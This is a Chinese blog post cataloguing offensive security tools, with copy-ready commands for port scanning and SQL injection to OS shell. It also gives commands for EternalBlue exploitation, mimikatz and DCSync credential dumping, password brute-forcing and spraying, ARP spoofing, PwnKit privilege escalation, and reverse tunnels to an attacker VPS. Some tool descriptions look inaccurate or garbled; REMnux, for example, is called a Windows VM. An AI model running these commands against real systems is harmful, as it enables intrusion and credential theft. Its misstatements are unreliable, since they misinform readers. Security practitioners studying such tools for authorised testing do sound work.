工具盘点

工具盘点

TOC

TOC

工具总结

信息收集

nmap

最经典的主机发现与端口扫描工具,几乎是所有渗透测试的第一步。

bash
# 基本扫描
nmap -sS -sV -p 1-65535 192.168.1.1

# 操作系统探测 + 脚本扫描
nmap -A -T4 192.168.1.1

# 内网存活发现
nmap -sn 192.168.1.0/24

# 导出 XML 给 Metasploit 使用
nmap -sS -sV -oX scan.xml 192.168.1.1

masscan

号称"互联网最快的端口扫描器",使用自定义 TCP/IP 协议栈,几分钟扫完整个互联网。适合大规模资产测绘。

bash
# 扫描整个 C 段
masscan -p80,443,8080 192.168.1.0/24 --rate=10000

# 扫描常见端口并输出
masscan -p1-65535 192.168.1.1 --rate=1000 -oJ output.json

naabu

新一代端口扫描器,Go 语言编写,速度快且支持多种协议探测(TCP/UDP/TLS),适合配合自动化流水线使用。

bash
# 全端口扫描
naabu -host 192.168.1.1 -p -

# 从文件读取目标
naabu -list targets.txt -p 80,443,8080

# 输出给 httpx 使用
naabu -host 192.168.1.1 -json | httpx

httpx

HTTP 探测工具,用于快速识别 Web 服务,获取状态码、标题、技术栈等信息。

bash
# 基础探测
httpx -l subdomains.txt -title -tech-detect -status-code

# 带指纹识别
httpx -l targets.txt -favicon -hash sha256 -jarm

# 截图保存
httpx -l targets.txt -screenshot -screenshot-dir ./screenshots

subfinder

子域名发现工具,利用被动源(证书透明度、搜索引擎、DNS 数据集等)快速收集子域名。

bash
# 基础枚举
subfinder -d example.com

# 输出给 httpx 验证存活
subfinder -d example.com -silent | httpx

ksubdomain

无状态子域名爆破工具,通过 DNS 解析验证子域名存活,速度极快。

bash
# 基础爆破
ksubdomain enum -d example.com -f subnames.txt

# 验证存活
ksubdomain verify -f subdomains.txt

gau

Get All URLs——从 AlienVault OTX、Wayback Machine、CommonCrawl 等源收集目标历史 URL。

bash
# 收集所有已知 URL
gau example.com

# 去重后输出
gau example.com | sort -u > urls.txt

# 配合 nuclei 检测漏洞
gau example.com | sort -u | nuclei

katana

新一代爬虫工具,Go 语言实现,支持单页应用(SPA)爬取,自动提取表单/参数/路径,非常适合配合被动扫描器使用。

bash
# 基本爬取
katana -u https://example.com

# 爬取并输出给 nuclei
katana -u https://example.com -silent | nuclei

子域名接管

子域名接管检测。当 DNS 记录指向已失效的第三方服务(如未使用的云服务实例)时,攻击者可注册同名服务接管子域名。常用工具包括 subjackcan-i-take-over-xyz

内网扫描与资产测绘

fscan

内网综合扫描工具,适合拿到入口后快速内网信息收集:存活探测、端口扫描、服务识别、MS17010 检测、Web 指纹一把梭。

bash
# 扫描单个 IP 默认端口
fscan -h 192.168.1.1

# 扫描 C 段
fscan -h 192.168.1.0/24

# 组合拳:主机存活 + 全端口 + 漏洞扫描
fscan -h 192.168.1.0/24 -p 1-65535 -np

gogo

内网渗透扫描器,功能类似 fscan 但更注重扫描速度和插件化,适合大网段快速定位脆弱点。

bash
# 默认扫描
gogo -i 192.168.1.0/24

# 指定端口和线程数
gogo -i 192.168.1.1 -p 1-65535 -t 1000

shodan / fofa / censys

网络空间测绘搜索引擎。Shodan 扫设备/Banner,Fofa 是国内同类产品检索域名/端口/Banner。攻击面管理中用于大规模资产探查。

漏洞扫描

nuclei

漏洞模板扫描引擎,基于 YAML 的 POC 模板,社区活跃,POC 库极其丰富(5000+ 模板)。

bash
# 使用所有模板扫描
nuclei -u https://example.com -t nuclei-templates/

# 只扫描高危漏洞
nuclei -l targets.txt -s critical,high

# 扫描特定 CVE
nuclei -u https://example.com -t cves/2024/

xray

长亭科技出品的被动漏洞扫描器,社区版免费但功能强大。通过代理流量被动分析,支持 SQL 注入、命令注入、XSS、SSRF 等检测。

bash
# 基础监听
xray webscan --listen 127.0.0.1:7777

# 配合浏览器使用,设置代理为 127.0.0.1:7777 即可

zap (Zed Attack Proxy)

OWASP 的免费 Web 安全扫描器,类似 Burp Suite 的主动扫描 + 被动扫描,自带爬虫、Ajax 蜘蛛、Fuzzer、WebSocket 测试。可作为自动化的 DAST 工具嵌入 CI/CD 流程。

awvs (Acunetix)

商业 Web 漏洞扫描器,自动爬取 + 深度扫描,检测 SQL 注入/XSS/SSRF/RCE 等。准确率较高,支持生成合规报告。附带盲注入验证(带外 DNS 追踪)。

nessus

商业漏洞扫描器,传统漏洞管理首选。内置 70000+ 插件,覆盖系统漏洞、配置合规、Web 安全、数据库安全等。

openvas (Greenbone)

开源漏洞扫描器,Nessus 的开源替代品,适合预算有限的团队。

Web 应用测试

burp suite

Web 安全测试的事实标准。Community 版免费,Professional 版支持全自动化扫描。核心功能:代理拦截、Repeater(请求重放)、Intruder(暴力测试)、Scanner(自动扫描)、Collaborator(外带检测)。

插件生态丰富,推荐:

  • Autorize — 越权检测自动化
  • Turbo Intruder — 高速并发暴力测试(HTTP 管道复用)
  • Logger++ — 增强日志记录
  • HaE — 高亮标记敏感信息

yakit

Yaklang 团队的 Web 安全测试平台,国内开发,类似 Burp Suite 但更贴合国人习惯,支持 MITM 交互式劫持、插件化扫描、模糊测试。

sqlmap

SQL 注入自动化利用工具,功能极其全面:自动检测、数据枚举、文件读写、命令执行、提权等。

bash
# 基础检测
sqlmap -u "http://example.com/page.php?id=1"

# 指定注入类型
sqlmap -u "http://example.com/page.php?id=1" --technique=BEUST

# 枚举数据库
sqlmap -u "http://example.com/page.php?id=1" --dbs

# 使用 POST 请求
sqlmap -r request.txt --os-shell

# 过 WAF(tamper 脚本)
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,charencode --random-agent

dirsearch

Web 目录/路径爆破工具,多线程请求 + 字典匹配来发现隐藏路径。

bash
# 基本扫描
dirsearch -u https://example.com -e php,asp,aspx,jsp

# 递归扫描
dirsearch -u https://example.com -r --deep-recursive

# 使用自定义字典
dirsearch -u https://example.com -w /path/to/wordlist.txt

ffuzz

Go 语言编写的 Web Fuzz 工具,速度极快,不仅能爆破目录,还能 FUZZ 各种参数。

bash
# 目录爆破
ffuf -u https://example.com/FUZZ -w wordlist.txt

# POST 参数 Fuzz
ffuf -u https://example.com/api -X POST -d '{"user":"FUZZ"}' -w wordlist.txt -H "Content-Type: application/json"

# 子域名枚举
ffuf -u http://FUZZ.example.com -w subdomains.txt

dalfox

参数化 XSS 扫描器,可自动在任何 URL 参数处注入 Payload 测试反射型 XSS。

bash
# 单 URL 扫描
dalfox url https://example.com/?q=FUZZ

# 批量扫描
cat urls.txt | dalfox pipe

# 使用自定义 Payload
dalfox url https://example.com/?q=FUZZ --user-payload payload.txt

dnslog / ysoSerial

DNSLog:DNS 带外数据收集平台。在盲注、SSRF、命令注入等无回显场景下通过 DNS 请求验证漏洞存在。

ysoserial:Java 反序列化漏洞利用 Payload 生成器,支持 30+ 利用链(CommonsCollections/Spring/Shiro 等)。

godnslog

Go 实现的自建 DNS/HTTP 外带日志系统。相比公共 DNSLog 平台更私密可控。

githacker

公开 GitHub 仓库信息泄露检测。自动搜寻仓库中泄露的密码/密钥/Token。

bash
githacker --url https://github.com/xxx/repo --output-folder result/

漏洞利用

metasploit (MSF)

最知名的渗透测试框架,集漏洞扫描 + 漏洞利用 + 后渗透于一体。模块按用途分为 exploit、auxiliary、post、payload 等。

bash
# 启动控制台
msfconsole

# 搜索模块
search smb

# 使用 exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
run

# 批量扫描漏洞
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run

C2 框架

cobalt strike

商业 C2 框架,红队行动标配。Beacon 模式支持 HTTP/HTTPS/DNS/SMB 等多种通信协议。主要功能:会话管理、横向移动、凭据提取、权限持久化、免杀生成。

非开源商业软件,需购买 License。

sliver

BishopFox 开源的 C2 框架,多协议支持(MTLS、WG、HTTP(S)、DNS),多平台 Implant 生成(Windows/Linux/macOS),内置丰富的红队工具链。免费且持续更新。

mythic

开源 C2 框架,Docker 部署、Web UI 管理、跨平台 Agent。可安装第三方 Agent 扩展,支持 HTTP、WebSocket 等通信方式,界面友好。

内网渗透与域安全

impacket

Python 实现的 Windows 网络协议工具包,处理 SMB/MSRPC/SAMR/Netlogon 等协议。常用于:凭据提取(secretsdump)、横向移动(wmiexec/psexec/smbexec)、Kerberos 攻击等。

bash
# 导出 SAM
secretsdump.py administrator:Password@192.168.1.1

# 远程执行命令
wmiexec.py administrator:Password@192.168.1.1

# DCSync 攻击
secretsdump.py domain/admin:Pass@192.168.1.1 -just-dc-user krbtgt

nxc (netExec)

新一代网络服务利用工具,是 CrackMapExec 的继任者。支持 SMB/SSH/WinRM/RDP/LDAP 等多协议,凭据喷洒、命令执行、信息枚举一条龙。

bash
# SMB 存活扫描
nxc smb 192.168.1.0/24

# 凭据喷洒
nxc smb 192.168.1.0/24 -u administrator -p Password123

# 执行命令
nxc smb 192.168.1.0/24 -u admin -p 'Pass' -x 'whoami'

responder

LLMNR/NBT-NS/mDNS 欺骗工具,内网渗透必备。通过监听并欺骗名称解析请求来捕获 Net-NTLM 哈希。

bash
# 基础监听
responder -I eth0

# 仅监听不做攻击
responder -I eth0 -A

# 捕获后使用 hashcat 破解
hashcat -m 5600 hash.txt /path/to/wordlist

bloodhound

AD 域关系图分析工具,通过图数据库分析域内权限关系,可视化攻击路径。SharpHound 收集数据 → BloodHound 分析展示。

SharpHound 收集器:

powershell
# Windows 上收集
SharpHound.exe -c All

分析结果可直观看到从当前权限到域管理员的攻击路径。

mimikatz

凭据提取神器,从 Windows 内存中提取密码哈希、明文密码、PIN 码、Kerberos 票据。内网渗透最重要的工具之一。

bash
# 提取所有凭据
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

# 导出票据
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

# DCSync 模拟
mimikatz.exe "lsadump::dcsync /user:krbtgt"

evil-winrm

Windows 远程管理(WinRM)连接工具,比普通 WinRM 更好用(文件上传/内存加载等)。

bash
evil-winrm -i 192.168.1.1 -u administrator -p 'Password'

密码攻击

hydra

在线密码暴力破解工具,支持 50+ 协议(SSH/FTP/HTTP/RDP/MySQL 等)。

bash
# SSH 爆破
hydra -l root -P pass.txt ssh://192.168.1.1

# HTTP POST 表单爆破
hydra -l admin -P pass.txt 192.168.1.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:Login failed"

# 多线程 HTTP 爆破
hydra -L users.txt -P pass.txt 192.168.1.1 http-get

john the ripper

老牌密码破解工具,支持几乎所有哈希格式。CPU 模式破解,配合规则集效率高。

bash
# 自动检测哈希类型
john hash.txt

# 指定格式破解
john --format=NT hash.txt --wordlist=rockyou.txt

# 显示已破解结果
john --show hash.txt

hashcat

GPU 加速密码破解,速度远超 John。支持 300+ 哈希类型,充分利用显卡并行计算。

bash
# NTLM 哈希破解
hashcat -m 1000 hash.txt rockyou.txt

# Net-NTLMv2 破解
hashcat -m 5600 hash.txt rockyou.txt

# 掩码攻击(8 位数字)
hashcat -m 1000 hash.txt -a 3 ?d?d?d?d?d?d?d?d

代理与隧道

proxifier / proxychains

代理链工具。Proxifier 是 GUI 应用,强制指定程序走代理;Proxychains 是 Linux 命令行工具,Hook 网络函数实现进程级别的代理转发。

bash
# proxychains 配置 /etc/proxychains4.conf 后
proxychains4 nmap -sT -Pn 10.0.0.1
proxychains4 msfconsole

frp

反向代理/内网穿透工具。客户端 frpc 映射端口到 frps。

ini
# frpc.ini
[common]
server_addr = your_vps_ip
server_port = 7000

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

cloudflare tunnel (Argo)

利用 Cloudflare CDN 建立隧道(cloudflared),隐藏真实服务器 IP。同样用途:NPS(轻量内网穿透服务端/客户端模式)。

iox

Go 语言端口转发工具,支持 TCP、UDP 级端口转发,适合多层内网代理场景。

chisel

Go 实现的快速 TCP/UDP 隧道,HTTP 传输,适合受限环境下的反向端口转发。

bash
# 服务端
chisel server -p 8080 --reverse

# 客户端(反向代理内网端口到服务端)
chisel client vps:8080 R:1080:socks

shadowsocks / v2ray / clash

代理工具,渗透测试中常用于隐藏 C2 流量(Nginx 前置伪装)、代理池轮换扫描源 IP。

网络分析

wireshark

网络协议分析器,抓包/过滤/解码/统计一把抓。渗透测试中常用于:流量劫持分析、明文密码捕获、协议逆向。支持 3000+ 协议解析。

过滤语法:http.request.method == "POST"ip.src == 192.168.1.1tcp.port == 4444

tcpdump

命令行网络抓包工具,Linux 标配。适合无图形界面的服务器环境。

bash
# 抓取指定接口流量
tcpdump -i eth0 -w capture.pcap

# 过滤 HTTP 流量
tcpdump -i eth0 port 80

# 实时查看包内容
tcpdump -i eth0 -A port 80

bettercap

模块化 MITM 框架,WiFi 嗅探、蓝牙探测、密码学混淆识别、DNS 欺骗、HTTP/HTTPS 透明代理等。Go 语言 + Web UI。

bash
# HTTP/HTTPS 代理
bettercap -eval "set arp.spoof.targets 192.168.1.100; arp.spoof on; net.sniff on"

# WiFi 扫描
bettercap -eval "wifi.recon on"

aircrack-ng

WiFi 安全测试套件:airmon-ng(开启监听模式)、airodump-ng(抓包)、aireplay-ng(注入攻击)、aircrack-ng(破解密钥)。

charles / fiddler

HTTP/HTTPS 抓包调试代理工具(GUI)。Charles 支持 Map Local/Remote(请求改写)、断点修改、SSL 代理;Fiddler 支持脚本扩展。两者都适合移动端抓包。

提权

linpeas / winPEAS

Linux/Windows 提权信息收集脚本(Privilege Escalation Awesome Scripts),自动检查系统配置、服务权限、SUID 文件、计划任务等潜在提权点。

bash
# Linux 端
./linpeas.sh | tee linpeas_report.txt

Powershell 端直接运行 Invoke-PEAS.ps1

GTFOBins / LOLBAS

  • GTFOBins:Unix 二进制文件的"合法滥用"——列出可通过常见系统命令进行提权、文件读写、反弹 Shell 的方法。
  • LOLBAS:与 GTFOBins 对应,Windows 版的 Living-off-the-land Binaries 清单。

两个都是在线查询网站,不是下载工具。

pkexec (PwnKit)

利用 Polkit 的 pkexec 权限提升漏洞(CVE-2021-4034),影响绝大多数 Linux 发行版。

bash
# 确认有漏洞后
./PwnKit

linux-exploit-suggester

Linux 内核提权建议脚本,根据内核版本匹配已知本地提权 Exploit。

bash
./linux-exploit-suggester.sh

逆向工程

ida pro

交互式反汇编器,逆向工程事实标准。功能极其强大:Hex-Rays 反编译器(F5 生成伪代码)、Python/IDC 脚本、远程调试、固件分析。付费专业版 + MIPS/ARM 等架构渲染。

常用插件:Findcrypt(识别加密常量)、Keypatch(修补二进制)、Ponce(符号执行污点分析)、D810(反混淆)。

ghidra

NSA 开源的逆向框架,Java 实现跨平台。内置反编译器、反汇编、变体搜索。免费替代 IDA 的首选。

x64dbg / ollydbg

Windows 平台动态调试器。x64dbg 支持 32/64 位程序,OllyDbg 面向 32 位。功能:断点、内存修改、汇编补丁、跟踪分析。ScyllaHide 插件用于绕过反调试。

gdb + peda / pwndbg / gef

Linux 平台调试"全家桶"。GDB 是 GNU 调试器;PEDA/Pwndbg/GEF 为 Python 扩展,专为 PWN 和逆向优化,显示寄存器/堆栈/glibc 信息。

bash
gdb ./binary
# Pwndbg 插件下常用命令
b *main              # 断点
r                    # 运行
vmmap                # 显示内存映射
heap                 # 分析堆结构

radare2

开源逆向框架,命令行操作,功能强大。包含分析/反汇编/调试/十六进制编辑/二进制补丁,适合自动化逆向流水线。

die (Detect It Easy)

文件类型检测器,识别编译器/打包器/加密器/保护壳,逆向工程第一步。远超 PEiD。

upx / pe-bear

UPX:开源可执行文件压缩壳(加壳/脱壳),常用于减小体积或增加分析难度。PE-bear:PE 文件结构查看器,深度查看 PE 头/节表/导入导出表。

ollyDumpEx / scylla

转储 + 重建导入表的工具,配合 OllyDbg/x64dbg 手动脱壳使用。Scylla 是 ImpREC 的现代替代品。

二进制安全与 PWN

pwntools

Python 库,CTF PWN 题的主力工具。封装了远程连接、数据处理、ROP 链构建、Shellcode 生成、格式化字符串利用等功能。

python
from pwn import *
p = remote('challenge.example.com', 1337)
p.sendlineafter(b'name:', b'admin')
p.interactive()

checkmate / angr

Checkmate:Ghidra 插件,通过符号执行定位 Python 原生类调用从而实现混合语言分析。Angr:Python 符号执行框架,自动求解约束条件,常用于 CTF 自动化解题(符号执行找输入绕过验证)。

恶意软件分析

procmon / procexp / autoruns (Sysinternals)

Windows 系统调试工具集。ProcMon 监控进程/线程/注册表/文件系统事件;ProcExp 进程管理器可定位句柄/DLL 注入;Autoruns 分析所有自启动项(配合 VirusTotal 扫描)。

yara

恶意软件识别/分类规则引擎。根据二进制或文本模式写规则,匹配已知恶意软件特征。每篇 APT 分析报告中几乎都有 YARA 规则。

取证分析

volatility

内存取证框架,分析内存转储(.vmem/.raw/.dmp),提取进程列表、网络连接、注册表、恶意代码注入点、明文凭据等。

bash
# 识别镜像配置文件
volatility -f memory.dmp imageinfo

# 列出进程
volatility -f memory.dmp --profile=Win7SP1x64 pslist

# 提取文件
volatility -f memory.dmp --profile=Win7SP1x64 filescan

autopsy / sleuth kit

Autopsy 是磁盘取证平台(GUI),基于 Sleuth Kit(命令行工具集)。用于分析磁盘镜像、恢复删除文件、提取时间线、分析文件系统元数据。

移动安全

easyre / apkIDE

EasyRE:Android 应用逆向工具包,集成 APK 解包/反编译/签名/重打包/安装。APKIDE:类似工具,可视化查看 DEX/Smali/Java 源码。

jadx / jeb

JADX — 开源 Android/Java 反编译器,DEX → Java 源码。JEB — 商业反编译器(支持 ARM/Android/Dalvik),拥有强大的本地反编译器和可视化 API。

fridadroid / mobSF

Frida + Droid:Frida Hook 框架在 Android 上的 Port/Fork(注入运行中的应用进行动态分析和修改)。MobSF:移动应用安全测试框架,支持静态/动态分析 Android/iOS 应用,自动检测漏洞。

渗透测试环境

kali linux

渗透测试标杆发行版,预装 600+ 安全工具,涵盖信息收集、漏洞评估、漏洞利用、逆向工程、取证等。

archlinux / blackarch

BlackArch 是 Arch Linux 的渗透测试发行版(2800+ 工具),适合喜欢滚动更新的安全研究者。

commando VM

Windows 渗透测试虚拟机,FireEye/Mandiant 出品。基于 Windows + Chocolatey 自动安装全套安全工具:Burp、Nmap、Metasploit、Cobalt Strike、Sysinternals 等。适合需要 Windows 原生工具链的场景。

remnux

Windows 恶意软件分析虚拟机,预装了反汇编器/调试器/行为监控/网络分析等全套 Malware Analysis 工具。与 Commando VM 属同一团队出品。

其他工具

anydesk / teamviewer(概念)

远控软件的"杀软特征",已被各大安全方案严密监控。攻击者常用远控软件建立持久化通道:使用白+黑手段通过 AnyDesk 的 Syscall 反弹 Shell,或替换合法的 TeamViewer 凭据接入。

cyberedge(赛博丽刃)

绿盟科技出品的红队模拟与评估平台,集成反病毒规避/权限提升/持久化/横向移动等模块。国内商业竞品。

常用在线工具集

密码破解在线查询:CrackStation、Cmd5、Somd5。子域名/证书信息:crt.sh、SecurityTrails、VirusTotal。Shellcode 转换生成器:shell-storm.org。加密解密:CyberChef(堪称网安瑞士军刀)。

博客使用指南
已抵达博客尽头

评论区